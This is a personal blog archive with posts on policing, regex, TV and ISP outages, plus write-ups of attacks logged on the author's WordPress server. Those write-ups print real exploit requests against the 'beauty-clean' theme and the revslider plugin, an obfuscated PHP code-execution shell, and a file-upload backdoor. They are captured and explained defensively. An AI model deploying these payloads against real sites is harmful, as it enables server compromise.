Indiana state trooper pulls woman over and asks “Do you accept Jesus Christ as your savior?”

A lot of Christians criticized me when I pointed out that WranglerStar, a YouTube content creator, should keep his religious views to himself after he spent the last minute of a six minute, ostensibly secular, video proselytizing.

While that persons behavior was inappropriate the behavior of Indiana State Police Trooper Brian Hamilton is so egregious he should be fired immediately. According to this Daily Kos story Trooper Hamilton used his position of power to proselytize for his religion after stopping a motorist for a chicken-shit offense for which he issued a verbal warning. While detaining the motorist he asked multiple questions unrelated to the traffic infraction. For example, “Did she accept Jesus Christ as her savior?” He also handed the driver a pamphlet from his preferred church. Holy shit! What motorist in the same situation would not feel intimidated to provide the answers Trooper Hamilton wanted to hear rather than tell him it’s none of his fucking business?

Fortunately the ACLU has filed a lawsuit.

Updated 2015-10-18: Sigh. This story is a year old. I really, really, hate it when an otherwise reputable site like Daily Kos doesn’t make it clear that they’re talking about ancient history.

I had to scroll to the seventh page of Google search results to find this link to PacerMonitor.com that provides some details about the lawsuit. It says the case terminated 2015-04-03 but provides no details regarding the disposition of the lawsuit.

After a lot of searching the only web page I could find that was not about the original incident and dated October 2014 was this article dated 2015-09-24. It talks about an accident to which Cpl. Brian Hamilton gave an official statement. Is that the same Brian Hamilton that was working for the Indiana State Police a year earlier? I would bet it is the same individual but the name is common enough that it could be coincidence. So, as all too often happens, it appears a “bad apple” simply moved from one police department to another.

Regular expressions: “Now you have two problems”

I’ve used the Zsh shell as my primary command line and scripting shell for the past seven years; and before that Korn shell for over a decade. Recently on the zsh-users mailing list someone asked for help that resulted in a recommendation to use a negative look-ahead regular expression.

Mikael Magnusson correctly pointed out

As a sidenote, (^foo)* is always useless to write,
since (^foo) will expand to the empty string, and then
the * will consume anything else. A useful way to think
of (^foo) is a * that will exclude any matches that
don't match the pattern foo.

To which I replied that people should Google “regular expression negative lookahead”. Which will result in numerous articles talking about Jamie Zawinski’s observation:

Some people, when confronted with a problem, think “I know, I’ll use regular expressions.” Now they have two problems.

I wholeheartedly agree with that sentiment. Notwithstanding the fact I still employ regular expressions every single day. The important thing being that I avoid them outside of ad-hoc interactive searches unless I have expended considerable thought about their correctness and failure modes if handed malformed input.

Watch Netflix’s “Black Mirror” if you like “Orphan Black”

I just binge watched the first two seasons of the British TV program Black Mirror on Netflix. If you liked Orphan Black you should definitely watch Black Mirror. Fuck that. You should watch Black Mirror even if you didn’t like Orphan Black.

Each episode of Black Mirror stands alone and is completely unrelated to the other episodes. Unrelated other than the fact that each one will make you think about and how we interact with each other and technology. Every single episode made me think about my own interactions with technology (e.g., the smart phone most of us carry with us 24/7). Not to mention my own base instincts about retributive justice or what it means to interact with someone I love.

Very few TV shows have affected me as deeply as Black Mirror. A similar TV series which was too short lived was The Booth at the End on Hulu.

Thailand has reached #1 in attacks against my server

The number of attacks from Thailand has been a significant fraction of the total for several months. In the past 24 hours I saw attacks from 51 address in Thailand, 241 in the past week. That exceeds the runner-up country (US) by a factor of five. Ten months ago I noted that Italy was the source of a disproportionate number of attacks.

Every single recent attack from Thailand has attempted to register a bogus WordPress account via a POST /wp-login.php?action=register request. Some piece of malware has managed to successfully infect a huge number of personal computers in Thailand and nowhere else. All of the computers are in the totbb.net domain

Below is the most recent such request. The details of the user login and email vary but the other details are pretty consistent.

P.S., I recognize that the numbers I’m reporting are insignificant compared to most web servers let alone the Internet as a whole. But that’s the point. My web server (blog) is only a little over a year old. My server is itself insignificant. Which means I have relatively little traffic to wade through. Which makes detecting some problems and trends easier.

POST /wp-login.php?action=register HTTP/1.1
Host: www.skepticism.us
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: Keep-Alive
User-Agent: Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388
Version/12.17
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png,
image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://www.skepticism.us/wp-login.php?action=register
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

user_login=PattiThorne3&user_email=pattisabj9571%40admin2%40metalchopsaw.info&redirect_to=&wp-submit=Register

VPS/cloud provider soladrive.com has no working abuse or support email

Today my server was attacked by a server owned by soladrive.com; specifically IP addr 96.44.156.75 (which is also owned by quadranet.com). I sent a report of the attack to abuse@soladrive.com. That email was rejected with this text:

  pipe to |/home/sola/public_html/support/pipe/pipe.php
    generated by abuse@soladrive.com
    local delivery failed

I then forwarded that to support@soladrive.com — the address I found on their web page. That also bounced with the same error. WTF! Why would anyone use a VPS provider without a working abuse email address? Oh, right. They use companies like this because they don’t give a shit about security or abuse from their network.

Shortly after writing the above text I sent an email to sales@soladrive.com which is also on their public web page as a point of contact. It too bounced with the same error. Jebus H Christus. The people running Soladrive.com appear to be morons.

An alcoholic on the bus ride home tonight… WTF is wrong with our mental health support network

I rode the bus this afternoon to assist the San Jose Downtown Streets Team in putting homeless people back to work. On the bus ride back home I noticed an individual on the bus I initially thought was blind and/or mentally handicapped. But a few minutes after I boarded he started shouting seemingly random phrases. He then made several random seating changes (while showing us his lovely butt crack).

Soon after that he slowly took off his pants. While doing so the bus driver calmly told him to put his pants back on. The rider then stood up (completely naked from the waste down) and slowly put on shorts. The bus driver pulled over at the next stop and could be seen talking to his dispatcher. The rider then moved to the very back of the bus where I observed him drinking what appeared to be straight vodka while intermittently spitting and drooling on the floor. I suspect the alcoholic had pissed himself thus prompting the change of pants.

The bus driver was very polite to the alcoholic and told him the sheriff would be arriving soon and he could wait on the bus or on the sidewalk. The alcoholic chose to wait on the bus. At which point the driver suggested to the rest of us that we should consider changing to the next route #22 bus that was about to arrive at our location.

The bus driver should be commended for an excellent job in handling a difficult and uncomfortable situation. I wish I had stayed to observe how the police handled the situation. I hope the police exhibited the same professionalism and compassion shown by the bus driver but I would be surprised if they did so. Hopefully this person will get some help for his addiction but I doubt that will happen given that our state run mental health programs have been underfunded for decades.

Is it just Comcast or do all broadband cable ISPs suck?

Yesterday I had my second Internet outage in the less than three months since I switched to Comcast cable broadband as my ISP. The first incident was a little less than two months ago when my IPv6 address changed for no reason and hardware and software connecting me to the Internet failed to handle the situation. In the preceding seven years using AT&T + Sonic.net I had exactly two Internet outages and one of those was because my DSL modem died.

In the middle of watching a film via my AppleTV device I lost connectivity to the Internet. Absolutely nothing worked. I couldn’t resolve host names or ping well known addresses from my Mac Pro server. I had to power-cycle my cable modem (a Netgear CM400 less than three months old) to restore service. I didn’t time it precisely but I allowed at least 15 minutes for the problem to resolve itself in case it was a transient issue before I intervened.

If I’m going to have to manually intervene every month or two to restore connectivity to the Internet I’m going to be one very pissed off Comcast customer. This is not bleeding edge technology. These sorts of problems are not acceptable given the maturity of the technology.

Another interesting attack against the “beauty-clean” WP theme

Today I logged another attack that attempts to exploit the horribly broken (i.e., full of security holes) “beauty-clean” WordPress theme. It also exploits a misfeature of PHP that is one of hundreds of reasons that PHP needs to die. Anyone who tells me they’re proud they write most of their code in PHP is someone who probably received way too many awards as a child merely for participating.

I wrote about the first attack I noticed against this theme just two weeks ago. This most recent attack is similar yet different. It leverages the fact the WP theme creates a temporary file using the filename provided by the attacker and then doesn’t remove the file.

POST / HTTP/1.1
Referer: http://www.skepticism.us
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Accept: */*
Content-Type: multipart/form-data; boundary=(UploadBoundary)
Host: www.skepticism.us
Content-Length: 409
Connection: Close

--(UploadBoundary)
Content-Disposition: form-data; name="yiw_contact[]"; filename="resd.php"
Content-Type: text/php

<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$hh("/[discuz]/e",$_POST['h'],"Access");?>45000
--(UploadBoundary)
Content-Disposition: form-data; name="yiw_action"

sendemail
--(UploadBoundary)
Content-Disposition: form-data; name="id_form"

a_3_3
--(UploadBoundary)

Here is the PHP program the hacker is attempting to install on my system:

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$hh("/[discuz]/e",$_POST['h'],"Access");

Notice the childish attempt at obfuscating the code. Removing the obfuscation we get:

preg_replace("/[discuz]/e", $_POST['h'], "Access");

OMFG! It’s going to execute whatever PHP code the attacker passes via a “h” POST parameter four times: once for each occurrence of the letters “c” and “s” in the word “Access”. So not only is the person who wrote the “beauty-clean” theme incompetent so is this hacker.

Let’s treat gun owners like we treat pregnant women

This is making the rounds but can’t be repeated often enough, so…

The text from the image (so it’s searchable):

“Gun violence problem solved. Or, “hey, how about we treat every young man who wants to buy a gun like every woman who wants to get an abortion” — mandatory 48-hr waiting period, parental permission, a note from his doctor proving he understands what he’s about to do, a video he has to watch about the effects of gun violence, an ultrasound wand up the ass (just because). Let’s close down all but one gun shop in every state and make him travel hundreds of miles, take time off work, and stay overnight in a strange town to get a gun. Make him walk through a guantlet of people holding photos of loved ones who were shot to death, people who call him a murderer and beg him not to buy a gun.

It makes more sense to do this with young men and guns than with women and health care, right? I mean, no woman getting an abortion has killed a room full of people in seconds, right?” — via a friend of a friend

The malware a recent attack against the WordPress revslider plugin attempted to install

I’ve been seeing attempts to exploit bugs in the WordPress revslider plugin for a very long time. But all of the attacks that utilize a POST request have attempted to upload a Zip archive. And a bug in the mod_dumpio module meant I was unable to extract the contents of those zip files. Having just fixed the mod_dumpio module I was able to capture one of those zip archives. The attack was from a server at namecheaphosting.com (I’ve elided the binary zip data):

POST /tag/php/wp-admin/admin-ajax.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.skepticism.us
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Content-Length: 1122
Content-Type: multipart/form-data; boundary=xYzZY
Cookie:

--xYzZY
Content-Disposition: form-data; name="action"

revslider_ajax_action
--xYzZY
Content-Disposition: form-data; name="client_action"

update_plugin
--xYzZY
Content-Disposition: form-data; name="update_file"; filename="revslider.zip"
Content-Type: application/zip

PK…
--xYzZY--

And the contents of the uploaded zip file was a single file named revslider/dor.libs.php with the following content. As you can see it’s a poorly written minimalist backdoor.

<?php
echo "<title>RevSlideR 2015</title><br><br>";
$win = strtolower(substr(PHP_OS,0,3)) == "win";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = "4,1ON(BuSuX)";
}
else {$safemode = false; $hsafemode = "OFF(WoKeH)";}
$os = wordwrap(php_uname(),90,"<br>",1);
$xos = "Safe-mode:[Safe-mode:".$hsafemode."] 7 [OS:".$os."]";
echo "<center> ".$xos." </center><br>";

if(isset($_GET['x'])){
echo "<title>PiNDaH 2015</title><br><br>";
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/default.php";
copy($source, $desti);
}

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
        else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>